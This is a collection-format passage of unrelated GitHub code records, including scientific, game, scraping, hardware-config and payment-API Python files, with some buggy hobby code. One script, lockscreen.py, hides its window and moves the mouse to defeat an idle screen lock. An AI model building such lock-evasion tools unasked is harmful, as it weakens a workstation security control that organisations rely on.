device).to(device)\n\n    # Initial value\n    img = torch.FloatTensor(init_arr[1:-1, 1:-1, 1:-1]).view(-1, 1, nx, ny, nz).to(device)\n\n    start = time.time()\n    pnusols = []\n    number = 0\n\n    with torch.no_grad():\n\n        for step in range(maxit):\n            u = model(img)\n            img = u\n            pnusols.append(img.view(nx, ny, nz).cpu().numpy())\n\n            if (save == 1) and (mode == 0):\n                if step % 50 == 0:\n                    with open('./data/3d_gpu/' + init +'_' + str(number) + '.npy', 'wb') as f:\n                        np.save(f, img.view(nx, ny, nz).cpu().numpy())\n                        f.close()\n                    number += 1\n\n    runtime = time.time() - start\n    print(\"Pytorch Runtime: \", runtime)\n\n    return np.array(pnusols), runtime","repo_name":"kimy-de/gpuallencahn","sub_path":"3d/pytorch_code.py","file_name":"pytorch_code.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13938863767","text":"from turtle import Turtle, Screen\nfrom random import randint\n\nscreen = Screen()\nscreen.setup(width=800, height=480)\nbet = screen.textinput(title='Make your bet', prompt=\"Who gonna win? \")\ncolors = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"indigo\", \"violet\"]\ny_axis = [-150, -100, -50, 0, 50, 100, 150]\nturtles = []\n\nfor i in range(len(y_axis)):\n    t1 = Turtle(\"turtle\")\n    t1.color(colors[i])\n    t1.penup()\n    t1.goto(x=-380, y=y_axis[i])\n    turtles.append(t1)\n\nif bet:\n    race_on = True\n\nwhile race_on:\n    for turtle in turtles:\n        turtle.forward(randint(a=0, b=10))\n        if turtle.xcor() > 380:\n            race_on = False\n            winning_color = turtle.pencolor()\n            if winning_color == bet:\n                print(f\"You've won! The {winning_color} turtle is the winner!\")\n            else:\n                print(f\"You've lost. The {winning_color} turtle is the winner.\")\n\nscreen.exitonclick()","repo_name":"yadaovinzce52/Python-Projects","sub_path":"Turtle Race/race.py","file_name":"race.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7368315406","text":"#Check if an input year is a leap year\n#Leap years are (1) divisible by 4, (2) not divisible by 100, (3) unless (2) is also divisible by 400\n\nyear = int(input(\"Enter year: \"))\nyear1 = year%4\nyear2 = year%100\nyear3 = year%400\n\ndef leapyear(year):\n    year1 = year%4\n    year2 = year%100\n    year3 = year%400\n    year = year + 1\n    if year1 == 0 :\n        print(\"This could be a leap year, hold on\")\n        if year2 != 0 : return True #print(\"This is definitely a leap year\")\n        
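# Gregorian rule: a century year (divisible by 100) is a leap year only when it is also divisible by 400\n        elif year2 == 0 and year3 == 0 : return True #print(\"Hm.. 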
It's a leap year, yeah\")\n        else : print(\"That might be a leap year, I don't know\")\n    else : return False #print(\"That's not a leap year dog!\")\n\n# leapyear(year)\n\ndef daysinmonth(year, month):\n    \"\"\"Returns int, number of days in given month and year\"\"\"\n    #Docstring\n    months = {\n        \"January\" : 1,\n        \"February\" : 2,\n        \"March\" : 3,\n        \"April\" : 4,\n        \"May\" : 5,\n        \"June\" : 6,\n        \"July\" : 7,\n        \"August\" : 8,\n        \"September\" : 9,\n        \"October\" : 10,\n        \"November\" : 11,\n        \"December\" : 12\n    }\n    days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n    answer = days[months[month]-1]\n    if leapyear(year) :\n        answer += 1\n    return answer\n\nmonth = input(\"Enter month: \")\ndays = daysinmonth(year, month)\nprint(days)","repo_name":"Pham3n/python100days","sub_path":"day10/100daysinmonth.py","file_name":"100daysinmonth.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18709565133","text":"from Bio.Seq import *\nimport re\ngenome_seq=\"\"\nwith open(\"/Users/yiranli/Downloads/genome.fasta\") as f1:\n\tfor line in f1:\n\t\tif not line.startswith(\">\"):\n\t\t\tgenome_seq=genome_seq+line.strip()\ngenome_seq_rc=reverse_complement(genome_seq)\n\nwith open(\"/Users/yiranli/Downloads/cpar_tRNA_cryptodb.fa\") as f2:\n\tfor line in f2:\n\t\t# if not line.startswith(\">\"):\n\t\t# \tprint(line.strip())\n\t\t# else:\n\t\t# \ti_seq=line.strip()\n\t\t# \tprint(reverse_complement(i_seq))\n\t\tif not line.startswith(\">\"):\n\t\t\ti_seq=line.strip()\n\t\t\ti_seq=reverse_complement(i_seq)\n\t\t\tfor j in range(0,len(i_seq)-16):\n\t\t\t\tfor i in range(j+16,len(i_seq)+1):\n\t\t\t\t\tcount=len(re.findall(i_seq[j:i],genome_seq))+len(re.findall(i_seq[0:i],genome_seq_rc))\n\t\t\t\t\tif count==1:\n\t\t\t\t\t\tprint('{}\\tY'.format(i_seq[j:i]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint('{}\\tN'.format(i_seq[j:i]))","repo_name":"YIRAN117/code_archives","sub_path":"mintmap_lookuptable.py","file_name":"mintmap_lookuptable.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72968034473","text":"from .cfr_base import CFRBase\n\n\nclass CFRLazy(CFRBase):\n    def __init__(\n        self,\n        *args,\n        **kwargs,\n    ):\n        kwargs.update(\n            dict(\n                # only allow alternating update cycles\n                alternating=True,\n            )\n        )\n        super().__init__(\n            *args,\n            **kwargs,\n        )\n        raise NotImplementedError(\"Lazy CFR is not yet implemented.\")\n","repo_name":"maichmueller/cfrainbow","sub_path":"src/cfrainbow/cfr/cfr_lazy.py","file_name":"cfr_lazy.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28860366219","text":"# SI5324 Configuration Interpreter\r\n# By Elliott Koehn\r\n# 2019-10-03\r\n\r\n# Takes the output SI5324 register map from DSPLLsim and places it into a verilog autoconfiguration file.\r\n\r\n### Import packages\r\nfrom os import path\r\nimport sys\r\nimport datetime\r\npathname = path.dirname(sys.argv[0])\r\n\r\n#%% Custom definition alternative to isdigit that includes hex characters\r\ndef ishex(char):\r\n    if char.isdigit():\r\n        return True\r\n    elif (char >= 'A') and (char <= 'F'):\r\n        return True\r\n    else:\r\n        return False\r\n\r\n#%% Format Line for Verilog\r\ndef format_line(line, count):\r\n    reg = ''\r\n    data = ''\r\n    i = True\r\n    for c in line:\r\n        if not ishex(c):\r\n            if reg == '':\r\n                continue\r\n            else:\r\n                i = False\r\n        
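# hex characters before the first non-hex separator form the register number; those after it form the data byte\r\n        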
else:\r\n if i == True:\r\n reg += c\r\n else:\r\n data += c\r\n vline = \"\\t\\t6'd\" + str(count) + \": begin SI_DATA = {8'hD0,8'd\" + reg + \",8'h\" + data + \"}; end\\n\"\r\n return vline\r\n\r\n#%% Open Configuration File\r\nwhile True:\r\n file = input('Enter the file name of the configuration, (default is ''SI5324 Config 1-1 at 200MHz''): ')\r\n if not file:\r\n file = \"SI5324 Config 1-1 at 200MHz\" # Default 1 to 1 at 200 MHz Clock Configuration\r\n elif file == \"q\":\r\n sys.exit(0)\r\n try:\r\n cfg_file = open(path.join(pathname, file + '.txt'), 'r')\r\n except:\r\n continue\r\n else:\r\n break\r\n\r\ncomment = \"\"\"//////////////////////////////////////////////////////////////////////////////////\r\n// SI5324 AutoConfig generated based on \r\n// \"\"\" + file + \"\"\" generated from SI DSPLLsim software\r\n//\r\n// By Elliott Koehn\r\n//\r\n// Autogenerated on \"\"\" + str(datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")) + \"\"\"\r\n//\r\n//////////////////////////////////////////////////////////////////////////////////\\n\r\nmodule \"\"\"\r\n\r\n#%% File Settings\r\nfile = file.replace(' ', '_').replace('-', '_')\r\noutput = file + \".v\"\r\npart1 = \"z1_SI5324_AutoConfig\"\r\npart2 = \"z2_SI5324_AutoConfig\"\r\n\r\n#%% Create output file and write part 1\r\nout = open(path.join(pathname, output), \"w+\")\r\np1 = open(path.join(pathname, part1), \"r\")\r\nif p1.mode == 'r':\r\n contents = p1.read()\r\np1.close()\r\nout.write(comment + file + contents)\r\n\r\n#%% Write in register map\r\ncount = 1\r\ndefault = ''\r\nwhile True:\r\n line = cfg_file.readline()\r\n if not line:\r\n break\r\n if line[0] == '#':\r\n continue\r\n if line[-1] != '\\n':\r\n line = line + '\\n'\r\n vline = format_line(line, count)\r\n if count == 0:\r\n default = \"\\t\\tdefault\" + vline[7:]\r\n out.write(vline)\r\n count += 1\r\ncfg_file.close()\r\nout.write(default)\r\n\r\n#%% Write part 2\r\np2 = open(path.join(pathname, part2), \"r\")\r\nif p2.mode == 'r':\r\n contents = p2.read()\r\np2.close()\r\nout.write(contents)\r\nout.close()\r\nsys.exit(0)","repo_name":"ekoehn/OTDR_KC705","sub_path":"si5324_config.py","file_name":"si5324_config.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17933777384","text":"\ndef calc(a,b):\n sum = a + b\n print(\"Sum: \", str(sum))\n difference = a - b\n print(\"Difference: \",str(difference))\n multiply = a * b\n print(\"Product: \", str(multiply))\n divide = 0\n if(b != 0):\n divide = a / b\n print(\"Quotient: \",str(divide))\n else:\n print(\"You can't divide by zero!!!\")\n results = [sum,difference,multiply,divide]\n addedList = 0\n for num in results:\n addedList += num\n print(\"Added list: \", str(addedList))\n\n\ncalc(4,3)\n\n\n\n","repo_name":"Jacob-Eckroth-School/362-InClassGit","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"858289541","text":"from __future__ import annotations\n\nimport argparse\nimport os.path\n\nimport pytest\n\nimport support\n\nINPUT_TXT = os.path.join(os.path.dirname(__file__), \"input.txt\")\n\n\ndef compute(s: str) -> int:\n rtn_val = 0\n lines = s.splitlines()\n letter = 0\n for line in range(0, len(lines), 3):\n e1 = lines[line]\n e2 = lines[line+1]\n e3 = lines[line+2]\n\n for i in e1:\n if i in e2 and i in e3:\n letter = i\n break\n if letter.islower():\n rtn_val += 
ord(letter) - 96\n        else:\n            rtn_val += ord(letter) - 38\n\n    return rtn_val\n\n\nINPUT_S = \"\"\"\\\nvJrwpWtwJgWrhcsFMMfFFhFp\njqHRNqRjqzjGDLGLrsFMfFZSrLrFZsSL\nPmmdzqPrVvPwwTWBwg\nwMqvLMZHhHMvwLHjbvcjnnSBnvTQFn\nttgJtRGJQctTZtZT\nCrZsJsPPZsGzwwsLwLmpwMDw\n\"\"\"\nEXPECTED = 70\n\n\n@pytest.mark.parametrize(\n    (\"input_s\", \"expected\"),\n    ((INPUT_S, EXPECTED),),\n)\ndef test(input_s: str, expected: int) -> None:\n    assert compute(input_s) == expected\n\n\ndef main() -> int:\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"data_file\", nargs=\"?\", default=INPUT_TXT)\n    args = parser.parse_args()\n\n    with open(args.data_file) as f, support.timing():\n        print(compute(f.read()))\n\n    return 0\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n","repo_name":"grove825/aoc2022","sub_path":"day03/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25808200936","text":"#!/usr/bin/env python\n\nnum1 = int(input(\"num 1\"))\nnum2 = int(input(\"num 2\"))\nnum3 = int(input(\"num 3\"))\n\nif(num1 > num2 and num1 > num3):\n    print(\"Num1 maior que Num2 e Num3\")\nelif(num2 > num1 and num2 > num3):\n    print(\"Num2 maior que Num1 e Num3\")\nelse:\n    print(\"Num3 maior que Num1 e Num2\")\n","repo_name":"eduardoschulz/algoritmos-unisinos-fundamentos","sub_path":"aula3/exer4.py","file_name":"exer4.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42583987632","text":"## mypackage\\baskref_data_scraper.py\n\nfrom datetime import datetime\nfrom dataclasses import dataclass\nfrom urllib import parse\nfrom bs4 import BeautifulSoup\nfrom mypackage.html_scraper import HTMLScraper\n\n@dataclass\nclass BaskRefDataScraper(HTMLScraper):\n    \"\"\"Class for scraping & parsing basketball-reference.com data\"\"\"\n\n    # public functions\n\n    def get_games_data(self, game_urls: list) -> list:\n        \"\"\"\n        Scrapes the game data for all the game urls provided\n        :game_urls: list of box score game urls from basketball reference\n        :return: returns a list of dictionaries with game data\n        \"\"\"\n\n        return [self._scrape_game_data(url) for url in game_urls]\n\n    # Private Methods\n\n    ## scraping functions\n\n    def _scrape_game_data(self, game_url: str) -> dict:\n        \"\"\"\n        Scrapes the game data for the given game web page.\n        :game_url: a Basketball Reference URL to a game page\n        :return: returns a dictionary of game data\n        \"\"\"\n\n        game_data = self.scrape(game_url, self._parse_game_data)\n        game_data[\"game_id\"] = self._parse_game_id(game_url)\n        game_data[\"game_url\"] = game_url\n\n        return game_data\n\n    ## parsing functions\n\n    def _parse_game_data(self, game_page: BeautifulSoup) -> dict:\n        \"\"\"\n        Parses the game data for the given game web page.\n        :game_page: a parsed Basketball Reference game page\n        :return: returns a dictionary of game data\n        \"\"\"\n\n        # Team names\n        home_team_fn, home_team_sn = self._parse_team_name(game_page, \"home\")\n        away_team_fn, away_team_sn = self._parse_team_name(game_page, \"away\")\n\n        # game meta data\n        meta_data = self._parse_game_meta_data(game_page)\n\n        # basic stats\n        home_basic_dic = self._parse_basic_stats(\n            game_page, \"home\", home_team_sn\n        )\n\n        away_basic_dic = self._parse_basic_stats(\n            game_page, \"away\", away_team_sn\n        )\n\n        return {\n            \"home_team\": home_team_sn,\n            \"away_team\": away_team_sn,\n            \"home_team_full_name\": 
home_team_fn,\n            \"away_team_full_name\": away_team_fn,\n            **meta_data,\n            **home_basic_dic,\n            **away_basic_dic,\n        }\n\n    def _parse_team_name(\n        self, html: BeautifulSoup, team: str\n    ) -> tuple[str, str]:\n        \"\"\"\n        Provided the BR game page and the team parameter it parses out\n        the team short and long names.\n        :team: indicates the home or away team\n        :return: Tuple(team long name, team short name)\n        \"\"\"\n\n        if team not in [\"home\", \"away\"]:\n            raise ValueError('The team argument can only be \"home\" or \"away\"')\n\n        team_idx = 2 if team == \"home\" else 1\n\n        team_anchor = html.select_one(\n            f\"#content > div.scorebox > div:nth-child({team_idx}) \"\n            \"> div:nth-child(1) > strong > a\"\n        )\n\n        return team_anchor.text, team_anchor.attrs[\"href\"].split(\"/\")[2]\n\n    def _parse_game_meta_data(self, html: BeautifulSoup) -> dict:\n        \"\"\"\n        Provided the BR game page it parses out the game time and\n        game arena name.\n        :return: dictionary of meta data\n        \"\"\"\n\n        meta_holder = html.select_one(\"div.scorebox_meta\")\n\n        game_time = str_to_datetime(\n            meta_holder.find(\"div\").text, [\"%I:%M %p, %B %d, %Y\", \"%B %d, %Y\"]\n        )\n\n        arena_name = meta_holder.find_all(\"div\")[1].text.split(\",\")[0]\n\n        return {\n            \"game_time\": game_time,\n            \"arena_name\": arena_name,\n        }\n\n    def _parse_game_id(self, game_url: str) -> str:\n        \"\"\"\n        Provided a BR game url it parses out the game id.\n        :return: game id as a string.\n        \"\"\"\n\n        return (\n            parse.urlsplit(game_url).path.split(\"/\")[-1].replace(\".html\", \"\")\n        )\n\n    def _parse_basic_stats(\n        self, page: BeautifulSoup, team: str, team_sn: str\n    ) -> dict[str, int | float]:\n        \"\"\"\n        Provided the BR game page it parses out the basic stats\n        for either the home or the road team, depending on the\n        passed parameter.\n        :team: indicates whether the team is home or away\n        :return: dictionary of basic stats\n        \"\"\"\n\n        table_finder = f\"#box-{team_sn.upper()}-game-basic\"\n\n        table = page.select_one(table_finder)\n        tb_foot = table.select_one(\"tfoot\")\n\n        game_dic = {\n            f\"{team}_fg\": int(tb_foot.select_one(\"td[data-stat=fg]\").text),\n            f\"{team}_fga\": int(tb_foot.select_one(\"td[data-stat=fga]\").text),\n            f\"{team}_fg_pct\": float(\n                tb_foot.select_one(\"td[data-stat=fg_pct]\").text\n            ),\n            f\"{team}_fg3\": int(tb_foot.select_one(\"td[data-stat=fg3]\").text),\n            f\"{team}_fg3a\": int(tb_foot.select_one(\"td[data-stat=fg3a]\").text),\n            f\"{team}_fg3_pct\": float(\n                tb_foot.select_one(\"td[data-stat=fg3_pct]\").text\n            ),\n            f\"{team}_ft\": int(tb_foot.select_one(\"td[data-stat=ft]\").text),\n            f\"{team}_fta\": int(tb_foot.select_one(\"td[data-stat=fta]\").text),\n            f\"{team}_ft_pct\": float(\n                tb_foot.select_one(\"td[data-stat=ft_pct]\").text\n            ),\n            f\"{team}_orb\": int(tb_foot.select_one(\"td[data-stat=orb]\").text),\n            f\"{team}_drb\": int(tb_foot.select_one(\"td[data-stat=drb]\").text),\n            f\"{team}_trb\": int(tb_foot.select_one(\"td[data-stat=trb]\").text),\n            f\"{team}_ast\": int(tb_foot.select_one(\"td[data-stat=ast]\").text),\n            f\"{team}_stl\": int(tb_foot.select_one(\"td[data-stat=stl]\").text),\n            f\"{team}_blk\": int(tb_foot.select_one(\"td[data-stat=blk]\").text),\n            f\"{team}_tov\": int(tb_foot.select_one(\"td[data-stat=tov]\").text),\n            f\"{team}_pf\": int(tb_foot.select_one(\"td[data-stat=pf]\").text),\n            f\"{team}_pts\": int(tb_foot.select_one(\"td[data-stat=pts]\").text),\n        }\n\n        return game_dic\n\n\ndef str_to_datetime(date_str: str, formats: list[str]) -> datetime:\n    \"\"\"\n    Tries to convert a string date into a datetime with multiple 
formats.\n    If none of the formats work a default datetime is returned.\n    \"\"\"\n\n    for fmt in formats:\n        try:\n            return datetime.strptime(date_str, fmt)\n        except ValueError:\n            pass\n\n    return datetime(1900, 1, 1)","repo_name":"orion512/baskref_article","sub_path":"mypackage/baskref_data_scraper.py","file_name":"baskref_data_scraper.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11446503267","text":"import sys\nimport click\nimport os\nimport json\nfrom scraping import Scraping\nfrom network_graph import Networkgraph\n\n\ndef scrape():\n\n    scraping = Scraping()\n    link = input(\"Input Link of Article: \")\n    iterations = input(\"Input number of layers: \")\n    \n    database = scraping.runScraping(iterations, link)\n\n    return database\n\ndef display(db_path):\n    network = Networkgraph()\n    network.display(db_path)\n\ndef save(database, db_path):\n\n    with open(db_path, 'w') as f:\n        json.dump(database, f, indent=4)\n\ndef let_user_pick(options):\n    print(\"Please choose:\")\n    for idx, element in enumerate(options):\n        print(\"{}) {}\".format(idx+1,element))\n    print(\"\\n\")\n    i = input(\"Enter number: \")\n    try:\n        if 0 < int(i) <= len(options):\n            return int(i)\n    except:\n        pass\n    return None\n\nif __name__ == \"__main__\":\n    print(\"-----------------------------------------------------\")\n    print(\"------------ PubMed Web Scraping Starting -----------\")\n    print(\"-----------------------------------------------------\\n\")\n\n    options = [\"Run Webscraping and Display Network Graph\", \n    \"Display Network Graph from previous Search\",\n    \"Set Chromium Webbrowser Path\",\n    \"Exit Application\"]\n\n    while True:\n\n        pick = let_user_pick(options)\n        print(\"\\n\")\n\n        if pick == 1:\n            print(\"-----------------------------------------------------\")\n            db_name = input(\"Input name for database (No spaces): \")\n            db_path = f\"Results/{db_name}.json\"\n            database = scrape()\n\n            save(database, db_path)\n            display(db_path)\n\n        elif pick == 2:\n            print(\"-----------------------------------------------------\")\n            dirlist = os.listdir(\"Results\")\n            dirlist = [elem[:-5] for elem in dirlist]\n            ID = let_user_pick(dirlist)\n            db_path = f\"Results\\{dirlist[ID-1]}.json\" \n            # print(db_path)\n            display(db_path)\n        \n        elif pick == 3:\n            print(\"-----------------------------------------------------\")\n            webpath = input(\"Input chromium Webbrowser path: \")\n            webpath = webpath + \"\\chromedriver.exe\"\n\n            with open(\"config.json\", 'w') as f:\n                json.dump({\"path\": webpath}, f, indent=4)\n\n        elif pick == 4:\n            print(\"-----------------------------------------------------\")\n            print('Closing')\n            break\n\n        else:\n            print(\"Invalid Pick\\n\")\n\n    ","repo_name":"doublearon2203/PubmedScraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74747604392","text":"import ctypes\nimport os\nimport sys\nimport autoit\nimport time\nimport threading\nimport keyboard\nimport pyautogui\nfrom pynput import mouse\nimport pystray\nfrom PIL import Image, ImageDraw\nimport win32gui\nimport win32con\n\nstart_moving = False\nlock_overtime = 150\ncompose_key = 'alt+shift+ctrl+right'\nhwnd = None\n\n# Show the console window\ndef show_console():\n    
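# GetConsoleWindow returns the handle of the attached console window (0 if there is none)\n    hwnd = 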
ctypes.windll.kernel32.GetConsoleWindow()\n    if hwnd:\n        ctypes.windll.user32.ShowWindow(hwnd, 0)\n\n# Tray action: show the window\ndef on_show(icon, item):\n    show_console()\n\n# Tray action: exit the window and the program\ndef on_exit(icon, item):\n    global exit_program\n    exit_program = True\n    icon.stop()\n    os._exit(0)\n\n# Start the tray icon\ndef run_icon():\n    icon.run()\n\n# Mouse click listener\ndef on_click(x, y, button, pressed):\n    global start_moving\n    if pressed: # stop the automatic movement if the mouse is pressed\n        start_moving = False\n\n# Mouse scroll listener\ndef on_scroll(x, y, dx, dy):\n    global start_moving\n    start_moving = False # stop the automatic movement if the mouse scrolls\n\n# Hotkey toggles the program on/off\ndef toggle_activation_state(e=None):\n    global is_active\n    is_active = not is_active\n\n# Check the window status\ndef check_window_status():\n    global hwnd\n    # get the current console window handle\n    hwnd = ctypes.windll.kernel32.GetConsoleWindow()\n    while True:\n        time.sleep(0.5)\n        if hwnd is not None:\n            foreground_window = win32gui.GetForegroundWindow()\n            if foreground_window != hwnd:\n                # hide the console window and its taskbar icon\n                hide_console()\n\ndef move_mouse():\n    global start_moving, is_active, exit_program\n    last_x, last_y = pyautogui.position()\n    last_time = time.time()\n    is_active = True\n    start_moving = False\n\n    while True:\n        if exit_program:\n            return\n        if is_active:\n            x, y = pyautogui.position()\n            current_time = time.time()\n            if last_x == x and last_y == y:\n                elapsed_time = current_time - last_time\n                if elapsed_time >= lock_overtime:\n                    start_moving = True\n                    while start_moving and is_active:\n                        autoit.mouse_move(100, 100, speed=10)\n                        time.sleep(0.1)\n                        x, y = pyautogui.position()\n                        if x != 100 or y != 100:\n                            start_moving = False\n                        autoit.mouse_move(200, 200, speed=10)\n                        time.sleep(0.1)\n                        x, y = pyautogui.position()\n                        if x != 200 or y != 200:\n                            start_moving = False\n                        last_x, last_y = x, y\n                        last_time = time.time()\n            else:\n                last_x, last_y = x, y\n                last_time = time.time()\n                start_moving = False\n            time.sleep(5)\n        else:\n            time.sleep(5)\n\nif __name__ == '__main__':\n    try:\n        hide_console()\n        exit_program = False\n\n        icon = pystray.Icon(\"lockscreen\", Image.open(\"lock.png\"))\n        icon.menu = pystray.Menu(pystray.MenuItem('Show', on_show), pystray.MenuItem('Exit', on_exit))\n\n        tray_thread = threading.Thread(target=run_icon)\n        tray_thread.start()\n\n        print('Anti auto-lock-screen program started!')\n\n        mouse_thread = threading.Thread(target=move_mouse) # automatic mouse movement thread\n        mouse_listener = mouse.Listener(on_click=on_click, on_scroll=on_scroll) # mouse click/scroll listener thread\n        keyboard.add_hotkey(compose_key, toggle_activation_state) # hotkey to toggle the program\n        check_window_thread = threading.Thread(target=check_window_status) # window status checking thread\n\n        mouse_thread.start()\n        mouse_listener.start()\n        check_window_thread.start()\n        mouse_thread.join()\n        mouse_listener.join()\n        check_window_thread.join()\n\n    except Exception as e:\n        print(e)\n        input(\"Press any key\")\n        os._exit(0)\n","repo_name":"tom200989/autoin","sub_path":"demo/lockscreen/lockscreen.py","file_name":"lockscreen.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"29126079124","text":"# coding: utf-8\n\n\"\"\"\n    CardPay REST API\n\n    Welcome to the CardPay REST API. The CardPay API uses HTTP verbs and a [REST](https://en.wikipedia.org/wiki/Representational_state_transfer) resources endpoint structure (see more info about REST). Request and response payloads are formatted as JSON. Merchants use the API to create payments, refunds, payouts or recurrings, to check or update transaction status, and to get information about created transactions. 
The API authentication process is based on the [OAuth 2.0](https://oauth.net/2/) standard. For recent changes see the changelog section. # noqa: E501\n\n    OpenAPI spec version: 3.0\n    \n    Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re  # noqa: F401\n\nimport six\n\n\nclass PlanUpdateRequestPlanData(object):\n    \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n    Do not edit the class manually.\n    \"\"\"\n\n    \"\"\"\n    Attributes:\n      swagger_types (dict): The key is attribute name\n                            and the value is attribute type.\n      attribute_map (dict): The key is attribute name\n                            and the value is json key in definition.\n    \"\"\"\n    swagger_types = {\"name_to\": \"str\", \"status_to\": \"str\"}\n\n    attribute_map = {\"name_to\": \"name_to\", \"status_to\": \"status_to\"}\n\n    def __init__(self, name_to=None, status_to=None):  # noqa: E501\n        \"\"\"PlanUpdateRequestPlanData - a model defined in Swagger\"\"\"  # noqa: E501\n\n        self._name_to = None\n        self._status_to = None\n        self.discriminator = None\n\n        if name_to is not None:\n            self.name_to = name_to\n        if status_to is not None:\n            self.status_to = status_to\n\n    @property\n    def name_to(self):\n        \"\"\"Gets the name_to of this PlanUpdateRequestPlanData.  # noqa: E501\n\n        New plan name - for RENAME operation only  # noqa: E501\n\n        :return: The name_to of this PlanUpdateRequestPlanData.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._name_to\n\n    @name_to.setter\n    def name_to(self, name_to):\n        \"\"\"Sets the name_to of this PlanUpdateRequestPlanData.\n\n        New plan name - for RENAME operation only  # noqa: E501\n\n        :param name_to: The name_to of this PlanUpdateRequestPlanData.  # noqa: E501\n        :type: str\n        \"\"\"\n        if name_to is not None and len(name_to) > 25:\n            raise ValueError(\n                \"Invalid value for `name_to`, length must be less than or equal to `25`\"\n            )  # noqa: E501\n        if name_to is not None and len(name_to) < 0:\n            raise ValueError(\n                \"Invalid value for `name_to`, length must be greater than or equal to `0`\"\n            )  # noqa: E501\n\n        self._name_to = name_to\n\n    class StatusTo(object):\n        ACTIVE = \"ACTIVE\"\n        INACTIVE = \"INACTIVE\"\n\n    @property\n    def status_to(self):\n        \"\"\"Gets the status_to of this PlanUpdateRequestPlanData.  # noqa: E501\n\n        New state of plan (ACTIVE or INACTIVE) - for CHANGE_STATUS operation only  # noqa: E501\n\n        :return: The status_to of this PlanUpdateRequestPlanData.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._status_to\n\n    @status_to.setter\n    def status_to(self, status_to):\n        \"\"\"Sets the status_to of this PlanUpdateRequestPlanData.\n\n        New state of plan (ACTIVE or INACTIVE) - for CHANGE_STATUS operation only  # noqa: E501\n\n        :param status_to: The status_to of this PlanUpdateRequestPlanData. 
# noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"ACTIVE\", \"INACTIVE\"] # noqa: E501\n if status_to not in allowed_values:\n raise ValueError(\n \"Invalid value for `status_to` ({0}), must be one of {1}\".format( # noqa: E501\n status_to, allowed_values\n )\n )\n\n self._status_to = status_to\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(\n map(lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x, value)\n )\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(\n map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\")\n else item,\n value.items(),\n )\n )\n else:\n if value is not None:\n result[attr] = value\n if issubclass(PlanUpdateRequestPlanData, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, PlanUpdateRequestPlanData):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"cardpay/python-sdk-v3","sub_path":"cardpay/model/plan_update_request_plan_data.py","file_name":"plan_update_request_plan_data.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"1561434020","text":"from flask import g as flask_g\nfrom flask import request as flask_request\nfrom flask import Response\nfrom flask import json\nimport pprint\n\nclass Flask:\n def __init__(self, app, zipkin, policy, registry):\n self._app = app\n self._zipkin = zipkin\n self._policy = policy\n self._registry = registry\n \n self._app.before_request(self._handleBeforeRequest)\n self._app.after_request(self._handleAfterRequest)\n \n self._app.add_url_rule('/berlioz', 'berlioz_debug', view_func=self._berlioz_debug)\n\n\n def _handleBeforeRequest(self):\n url = ''\n if flask_request.script_root is not None:\n url = flask_request.script_root\n if flask_request.path is not None:\n url = url + flask_request.path\n zipkin_span = self._zipkin.instrumentServer(flask_request.headers,\n flask_request.method,\n url)\n flask_g._berlioz_zipkin_span = zipkin_span\n zipkin_span.start()\n\n def _handleAfterRequest(self, response):\n zipkin_span = getattr(flask_g, 